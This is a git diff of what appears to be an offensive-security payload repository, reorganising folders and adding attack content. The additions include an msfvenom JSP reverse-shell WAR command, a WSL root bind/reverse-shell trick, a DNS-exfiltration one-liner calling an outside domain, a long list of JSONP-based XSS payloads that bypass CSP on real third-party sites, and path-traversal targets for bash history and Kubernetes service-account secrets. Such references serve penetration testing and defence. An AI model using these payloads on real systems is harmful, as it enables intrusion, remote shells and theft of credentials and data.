diff --git a/File Inclusion - Path Traversal/Intruders/Web-files.txt b/File Inclusion - Path Traversal/Intruders/Web-files.txt
index e37d8f30..c9736e7a 100644
--- a/File Inclusion - Path Traversal/Intruders/Web-files.txt	
+++ b/File Inclusion - Path Traversal/Intruders/Web-files.txt	
@@ -10,4 +10,5 @@ wp-admin.php
 /include/mysql.php
 /inc/mysql.php
 /sites/defaults/settings.php
-/phpmyadmin/changelog.php
\ No newline at end of file
+/phpmyadmin/changelog.php
+web.config
\ No newline at end of file
diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index 2d1c2d95..e9c14b58 100644
--- a/File Inclusion - Path Traversal/README.md	
+++ b/File Inclusion - Path Traversal/README.md	
@@ -1,13 +1,16 @@
-# Local/Remote File Inclusion
+# File Inclusion - Path Traversal
 
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 
+The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
+
 ## Summary
 
+* [Path Traversal](#path-traversal)
 * [Basic LFI](#basic-lfi)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
-  * [Wrapper php://filter](l#wrapper-phpfilter)
+  * [Wrapper php://filter](#wrapper-phpfilter)
   * [Wrapper zip://](#wrapper-zip)
   * [Wrapper data://](#wrapper-data)
   * [Wrapper expect://](#wrapper-expect)
@@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
 
+
+## Path Traversal
+
 Linux - Interesting files to check out :
 
 ```powershell
@@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail
 ```
 
+Other easy win files.
+
+```powershell
+/home/$USER/.bash_history
+/var/run/secrets/kubernetes.io/serviceaccount
+```
+
 ## Basic LFI
 
 ```powershell
diff --git a/Insecure management interface/intruders/springboot_actuator.txt b/Insecure management interface/Intruder/springboot_actuator.txt
similarity index 100%
rename from Insecure management interface/intruders/springboot_actuator.txt
rename to Insecure management interface/Intruder/springboot_actuator.txt
diff --git a/LDAP injection/Intruders/LDAP_FUZZ.txt b/LDAP injection/Intruder/LDAP_FUZZ.txt
similarity index 100%
rename from LDAP injection/Intruders/LDAP_FUZZ.txt
rename to LDAP injection/Intruder/LDAP_FUZZ.txt
diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruder/LDAP_attributes.txt
similarity index 100%
rename from LDAP injection/Intruders/LDAP_attributes.txt
rename to LDAP injection/Intruder/LDAP_attributes.txt
diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md
index 85c234c0..0ecfaaf7 100644
--- a/Methodology and Resources/Network Discovery.md	
+++ b/Methodology and Resources/Network Discovery.md	
@@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
 
 ```powershell
 nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
+-sn : Disable port scanning. Host discovery only.
+-n : Never do DNS resolution
 ```
 
 * Basic NMAP
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index cd8423f9..a967976e 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while rea
 p.waitFor()
 ```
 
+### War
+
+```java
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
+strings reverse.war | grep jsp # in order to get the name of the file
+```
+
+
 ### Lua
 
 Linux only
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index d6d844f5..93bdb7bf 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -1,7 +1,5 @@
 # Windows - Privilege Escalation
 
-Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
-
 ## Windows Version and Configuration
 
 ```powershell
@@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
 
-### Password in unattend.xml
+### Passwords in unattend.xml
 
 Location of the unattend.xml files
 
@@ -167,7 +165,7 @@ Example content
 
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
 
-## Processes Enum
+## Processes Enumeration
 
 What processes are running?
 
@@ -187,36 +185,32 @@ Do you have powershell magic?
 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 ```
 
-## Uploading / Downloading files
+## Using PowerSploit's PowerUp
 
-a wget using powershell
-
-```powershell
-powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
-```
-
-wget using bitsadmin (when powershell is not present)
-
-```powershell
-cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
-```
-
-now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
-
-```powershell
-%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
-```
-
-## Spot the weak service using PowerSploit's PowerUP
+Spot the weak service using PowerSploit's PowerUp
 
 ```powershell
 powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
 ```
 
+## Using Windows Subsystem for Linux (WSL)
+
+Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
+
+> With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
+
+```powershell
+wsl whoami
+./ubuntun1604.exe config --default-user root
+wsl whoami
+wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
+```
+
 ## Thanks to
 
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
-* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
\ No newline at end of file
+* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
+* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
\ No newline at end of file
diff --git a/NoSQL injection/Intruders/NoSQL.txt b/NoSQL injection/Intruder/NoSQL.txt
similarity index 100%
rename from NoSQL injection/Intruders/NoSQL.txt
rename to NoSQL injection/Intruder/NoSQL.txt
diff --git a/Open redirect/Open-Redirect-payloads.txt b/Open redirect/Intruder/Open-Redirect-payloads.txt
similarity index 100%
rename from Open redirect/Open-Redirect-payloads.txt
rename to Open redirect/Intruder/Open-Redirect-payloads.txt
diff --git a/Open redirect/open_redirect_wordlist.txt b/Open redirect/Intruder/open_redirect_wordlist.txt
similarity index 100%
rename from Open redirect/open_redirect_wordlist.txt
rename to Open redirect/Intruder/open_redirect_wordlist.txt
diff --git a/Open redirect/openredirects.txt b/Open redirect/Intruder/openredirects.txt
similarity index 100%
rename from Open redirect/openredirects.txt
rename to Open redirect/Intruder/openredirects.txt
diff --git a/Remote commands execution/Intruders/command-execution-unix.txt b/Remote commands execution/Intruder/command-execution-unix.txt
similarity index 100%
rename from Remote commands execution/Intruders/command-execution-unix.txt
rename to Remote commands execution/Intruder/command-execution-unix.txt
diff --git a/Remote commands execution/Intruders/command_exec.txt b/Remote commands execution/Intruder/command_exec.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Remote commands execution/Intruders/command_exec.txt
rename to Remote commands execution/Intruder/command_exec.txt
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index a6717e9c..40df9556 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -152,6 +152,10 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
 for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 
+```powershell
+$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
+```
+
 ## Thanks to
 
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
diff --git a/SQL injection/Intruders/Auth_Bypass.txt b/SQL injection/Intruder/Auth_Bypass.txt
similarity index 100%
rename from SQL injection/Intruders/Auth_Bypass.txt
rename to SQL injection/Intruder/Auth_Bypass.txt
diff --git a/SQL injection/Intruders/Auth_Bypass2.txt b/SQL injection/Intruder/Auth_Bypass2.txt
old mode 100755
new mode 100644
similarity index 100%
rename from SQL injection/Intruders/Auth_Bypass2.txt
rename to SQL injection/Intruder/Auth_Bypass2.txt
diff --git a/SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt b/SQL injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt
rename to SQL injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt
diff --git a/SQL injection/Intruders/FUZZDB_MSSQL.txt b/SQL injection/Intruder/FUZZDB_MSSQL.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MSSQL.txt
rename to SQL injection/Intruder/FUZZDB_MSSQL.txt
diff --git a/SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt b/SQL injection/Intruder/FUZZDB_MSSQL_Enumeration.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
rename to SQL injection/Intruder/FUZZDB_MSSQL_Enumeration.txt
diff --git a/SQL injection/Intruders/FUZZDB_MYSQL.txt b/SQL injection/Intruder/FUZZDB_MYSQL.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MYSQL.txt
rename to SQL injection/Intruder/FUZZDB_MYSQL.txt
diff --git a/SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt b/SQL injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt
rename to SQL injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt
diff --git a/SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
rename to SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt
diff --git a/SQL injection/Intruders/FUZZDB_Oracle.txt b/SQL injection/Intruder/FUZZDB_Oracle.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_Oracle.txt
rename to SQL injection/Intruder/FUZZDB_Oracle.txt
diff --git a/SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt b/SQL injection/Intruder/FUZZDB_Postgres_Enumeration.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt
rename to SQL injection/Intruder/FUZZDB_Postgres_Enumeration.txt
diff --git a/SQL injection/Intruders/Generic_ErrorBased.txt b/SQL injection/Intruder/Generic_ErrorBased.txt
old mode 100755
new mode 100644
similarity index 100%
rename from SQL injection/Intruders/Generic_ErrorBased.txt
rename to SQL injection/Intruder/Generic_ErrorBased.txt
diff --git a/SQL injection/Intruders/Generic_TimeBased.txt b/SQL injection/Intruder/Generic_TimeBased.txt
similarity index 100%
rename from SQL injection/Intruders/Generic_TimeBased.txt
rename to SQL injection/Intruder/Generic_TimeBased.txt
diff --git a/SQL injection/Intruders/Generic_UnionSelect.txt b/SQL injection/Intruder/Generic_UnionSelect.txt
old mode 100755
new mode 100644
similarity index 100%
rename from SQL injection/Intruders/Generic_UnionSelect.txt
rename to SQL injection/Intruder/Generic_UnionSelect.txt
diff --git a/SQL injection/Intruders/SQL-Injection b/SQL injection/Intruder/SQL-Injection
similarity index 100%
rename from SQL injection/Intruders/SQL-Injection
rename to SQL injection/Intruder/SQL-Injection
diff --git a/SQL injection/Intruders/SQLi_Polyglots.txt b/SQL injection/Intruder/SQLi_Polyglots.txt
similarity index 100%
rename from SQL injection/Intruders/SQLi_Polyglots.txt
rename to SQL injection/Intruder/SQLi_Polyglots.txt
diff --git a/SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT b/SQL injection/Intruder/payloads-sql-blind-MSSQL-INSERT
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT
rename to SQL injection/Intruder/payloads-sql-blind-MSSQL-INSERT
diff --git a/SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE b/SQL injection/Intruder/payloads-sql-blind-MSSQL-WHERE
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE
rename to SQL injection/Intruder/payloads-sql-blind-MSSQL-WHERE
diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT b/SQL injection/Intruder/payloads-sql-blind-MySQL-INSERT
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT
rename to SQL injection/Intruder/payloads-sql-blind-MySQL-INSERT
diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY b/SQL injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
rename to SQL injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY
diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE b/SQL injection/Intruder/payloads-sql-blind-MySQL-WHERE
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE
rename to SQL injection/Intruder/payloads-sql-blind-MySQL-WHERE
diff --git a/SSRF injection/ip.py b/SSRF injection/Files/ip.py
similarity index 100%
rename from SSRF injection/ip.py
rename to SSRF injection/Files/ip.py
diff --git a/SSRF injection/Parser & Curl < 7.54.png b/SSRF injection/Images/Parser & Curl < 7.54.png
similarity index 100%
rename from SSRF injection/Parser & Curl < 7.54.png
rename to SSRF injection/Images/Parser & Curl < 7.54.png
diff --git a/SSRF injection/SSRF_Parser.png b/SSRF injection/Images/SSRF_Parser.png
similarity index 100%
rename from SSRF injection/SSRF_Parser.png
rename to SSRF injection/Images/SSRF_Parser.png
diff --git a/SSRF injection/WeakParser.jpg b/SSRF injection/Images/WeakParser.jpg
similarity index 100%
rename from SSRF injection/WeakParser.jpg
rename to SSRF injection/Images/WeakParser.jpg
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index dfcdb301..3d645b93 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -168,7 +168,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
 http://127.1.1.1:80#\@127.2.2.2:80/
 ```
 
-![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg)
+![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
 
 
 ## SSRF via URL Scheme
diff --git a/Server Side Template injections/serverside.png b/Server Side Template injections/Images/serverside.png
similarity index 100%
rename from Server Side Template injections/serverside.png
rename to Server Side Template injections/Images/serverside.png
diff --git a/Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt b/Server Side Template injections/Intruder/JHADDIX_SSI_Injection.txt
similarity index 100%
rename from Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt
rename to Server Side Template injections/Intruder/JHADDIX_SSI_Injection.txt
diff --git a/Server Side Template injections/Intruders/ssi_quick.txt b/Server Side Template injections/Intruder/ssi_quick.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Server Side Template injections/Intruders/ssi_quick.txt
rename to Server Side Template injections/Intruder/ssi_quick.txt
diff --git a/Tar commands execution/--checkpoint-action=exec=sh shell.sh b/Tar commands execution/Files/--checkpoint-action=exec=sh shell.sh
old mode 100755
new mode 100644
similarity index 100%
rename from Tar commands execution/--checkpoint-action=exec=sh shell.sh
rename to Tar commands execution/Files/--checkpoint-action=exec=sh shell.sh
diff --git a/Tar commands execution/--checkpoint=1 b/Tar commands execution/Files/--checkpoint=1
old mode 100755
new mode 100644
similarity index 100%
rename from Tar commands execution/--checkpoint=1
rename to Tar commands execution/Files/--checkpoint=1
diff --git a/Tar commands execution/shell.sh b/Tar commands execution/Files/shell.sh
old mode 100755
new mode 100644
similarity index 100%
rename from Tar commands execution/shell.sh
rename to Tar commands execution/Files/shell.sh
diff --git a/Traversal directory/deep_traversal.txt b/Traversal directory/Intruder/deep_traversal.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Traversal directory/deep_traversal.txt
rename to Traversal directory/Intruder/deep_traversal.txt
diff --git a/Traversal directory/directory_traversal.txt b/Traversal directory/Intruder/directory_traversal.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Traversal directory/directory_traversal.txt
rename to Traversal directory/Intruder/directory_traversal.txt
diff --git a/Traversal directory/dotdotpwn.txt b/Traversal directory/Intruder/dotdotpwn.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Traversal directory/dotdotpwn.txt
rename to Traversal directory/Intruder/dotdotpwn.txt
diff --git a/Traversal directory/traversals-8-deep-exotic-encoding.txt b/Traversal directory/Intruder/traversals-8-deep-exotic-encoding.txt
similarity index 100%
rename from Traversal directory/traversals-8-deep-exotic-encoding.txt
rename to Traversal directory/Intruder/traversals-8-deep-exotic-encoding.txt
diff --git a/XSS injection/Intruders/jsonp_endpoint.txt b/XSS injection/Intruders/jsonp_endpoint.txt
new file mode 100644
index 00000000..e514d818
--- /dev/null
+++ b/XSS injection/Intruders/jsonp_endpoint.txt	
@@ -0,0 +1,54 @@
+#Google.com:
+"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
+"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
+"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
+"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
+#Blogger.com:
+"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
+#Yandex:
+"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
+"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
+#VK.com:
+"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
+#Marketo.com
+"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
+"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
+#AlibabaGroup:
+"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
+"><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>
+"><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script>
+"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
+"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>
+"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script>
+"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
+#Uber.com:
+"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
+#AOL/Yahoo
+"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
+"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
+"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
+"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
+"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
+"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
+"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>
+#Twitter.com:
+"><script+src="http://search.twitter.com/trends.json?callback=alert()"></script>
+"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script>
+"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script>
+#Others:
+"><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script>
+"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script>
+"><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
+"><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
+"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
+"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script>
+"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
+"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
+"><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>
+"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
+"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
+"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
+#GoogleAPI's
+"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
+"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
+ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
\ No newline at end of file
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 82f86206..3ce0402a 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -778,6 +778,8 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi
 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
 ```
 
+More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
+
 ### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
 
 Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)
diff --git a/_template_vuln/README.md b/_template_vuln/README.md
new file mode 100644
index 00000000..d4fb11d6
--- /dev/null
+++ b/_template_vuln/README.md
@@ -0,0 +1,26 @@
+# Vulnerability Title
+
+> Vulnerability description - reference
+
+Tools:
+
+- [Tool name - description](https://example.com)
+
+## Summary
+
+* [Something](#something)
+* [Something](#something)
+  * [Subentry 1](#sub1)
+  * [Subentry 2](#sub2)
+
+## Something
+
+Quick explanation
+
+```powershell
+Exploit
+```
+
+## Reference
+
+- [Blog title - Author, Date](https://example.com)
\ No newline at end of file